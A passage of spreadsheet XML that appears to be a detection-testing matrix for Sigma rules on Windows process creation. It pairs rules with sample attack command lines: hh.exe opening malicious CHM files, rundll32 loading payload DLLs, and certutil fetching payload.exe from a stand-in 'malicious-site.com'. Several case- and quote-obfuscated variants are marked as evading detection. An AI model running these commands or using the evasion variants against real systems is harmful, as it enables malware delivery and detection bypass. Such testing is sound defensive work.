        <v>0</v>
      </c>
      <c r="I1519" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1519" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1519" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1520" ht="15.75" customHeight="1" s="42">
      <c r="A1520" s="36" t="n"/>
      <c r="B1520" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1520" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1520" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1520" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1520" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1520" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1520" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1520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20" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1520" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1521" ht="15.75" customHeight="1" s="42">
      <c r="A1521" s="36" t="n"/>
      <c r="B1521" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1521" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1521" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1521" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\temp\custom_module.dll,Main</t>
        </is>
      </c>
      <c r="F1521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1521" s="36" t="n"/>
      <c r="J1521" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1521" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1522" ht="15.75" customHeight="1" s="42">
      <c r="A1522" s="36" t="n"/>
      <c r="B1522" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1522" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1522" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1522" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F1522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1522" s="36" t="n"/>
      <c r="J1522" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1522" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1523" ht="15.75" customHeight="1" s="42">
      <c r="A1523" s="36" t="n"/>
      <c r="B1523" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1523" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1523" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1523" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" C:\Windows\Temp\t^m^p.bat</t>
        </is>
      </c>
      <c r="F1523" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1523" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1523" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1523" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution (95022b85-ff2a-49fa-939a-d7b8f56eeb9b)</t>
        </is>
      </c>
      <c r="J1523" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1523" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1524" ht="15.75" customHeight="1" s="42">
      <c r="A1524" s="36" t="n"/>
      <c r="B1524" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1524" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1524" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1524" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\GTHREA~1.DLL,EntryPoint</t>
        </is>
      </c>
      <c r="F1524" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1524" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1524" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1524" s="36" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J1524" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1524" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1525" ht="15.75" customHeight="1" s="42">
      <c r="A1525" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1525" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1525" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1525" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1525" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1525" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1525" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1525" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1525" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1525" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1525" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1526" ht="15.75" customHeight="1" s="42">
      <c r="A1526" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1526" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1526" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1526" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1526" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1526" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1526" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1526" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1526" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1526" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1526" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1527" ht="15.75" customHeight="1" s="42">
      <c r="A1527" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1527" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1527" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1527" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1527" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1527" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1527" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1527" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I152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27" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1527" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1528" ht="15.75" customHeight="1" s="42">
      <c r="A1528" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1528" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1528" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1528" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1528" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1528" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1528" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1528" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1528" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1528" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1528" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1529" ht="15.75" customHeight="1" s="42">
      <c r="A1529" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1529" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1529" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1529" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1529" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1529" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1529" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1529" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1529" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1529" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1529" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1530" ht="15.75" customHeight="1" s="42">
      <c r="A1530" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1530" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1530" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1530" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1530" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1530" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1530" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1530" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1530" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1530" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1530" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1531" ht="15.75" customHeight="1" s="42">
      <c r="A1531" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1531" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1531" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1531" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1531" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1531" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1531" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1531" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1531" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1531" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1531" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1532" ht="15.75" customHeight="1" s="42">
      <c r="A1532" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1532" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1532" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1532" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1532" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1532" s="43" t="n"/>
      <c r="J1532" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1532" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1533" ht="15.75" customHeight="1" s="42">
      <c r="A1533" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1533" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1533" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1533" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1533" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1533" s="43" t="n"/>
      <c r="J1533" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1533" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1534" ht="15.75" customHeight="1" s="42">
      <c r="A1534" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1534" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1534" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1534" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1534" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1534" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1534" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1534" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1534" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1535" ht="15.75" customHeight="1" s="42">
      <c r="A1535" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1535" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1535" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1535" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1535" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1535" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1535" s="36" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1535" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1535" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1536" ht="15.75" customHeight="1" s="42">
      <c r="A1536" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1536" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1536" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1536" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1536" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1536" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1536" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1536" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1536" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1537" ht="15.75" customHeight="1" s="42">
      <c r="A1537" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B1537" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1537" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1537" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1537" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1537" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1537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37" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1537" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1538" ht="15.75" customHeight="1" s="42">
      <c r="A1538" s="43" t="n"/>
      <c r="B1538" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1538" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1538" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1538" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1538" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1538" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1538" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1538" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1539" ht="15.75" customHeight="1" s="42">
      <c r="A1539" s="43" t="n"/>
      <c r="B1539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1539" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1539" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1539" s="43" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1539" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1539" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1539" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1540" ht="15.75" customHeight="1" s="42">
      <c r="A1540" s="36" t="n"/>
      <c r="B1540" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1540" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1540" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1540" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1540" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1540" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1540" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1540" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1540" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1540" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1541" ht="15.75" customHeight="1" s="42">
      <c r="A1541" s="36" t="n"/>
      <c r="B1541" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1541" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1541" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1541" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1541" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1541" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1541" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1541" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1541" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1541" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1542" ht="15.75" customHeight="1" s="42">
      <c r="A1542" s="36" t="n"/>
      <c r="B1542" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1542" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1542" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1542" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1542" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1542" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1542" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1542" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1543" ht="15.75" customHeight="1" s="42">
      <c r="A1543" s="36" t="n"/>
      <c r="B1543" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1543" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1543" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1543" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1543" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1543" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1543" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1543" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1544" ht="15.75" customHeight="1" s="42">
      <c r="A1544" s="36" t="n"/>
      <c r="B1544" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1544" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1544" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1544" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1544" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1544" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1544" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1544" s="36" t="n"/>
      <c r="J1544" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1544" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1545" ht="15.75" customHeight="1" s="42">
      <c r="A1545" s="36" t="n"/>
      <c r="B1545" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1545" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1545" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1545" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1545" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1545" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1545" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1545" s="36" t="n"/>
      <c r="J1545" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1545" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1546" ht="15.75" customHeight="1" s="42">
      <c r="A1546" s="36" t="n"/>
      <c r="B1546" s="36" t="inlineStr">
        <is>
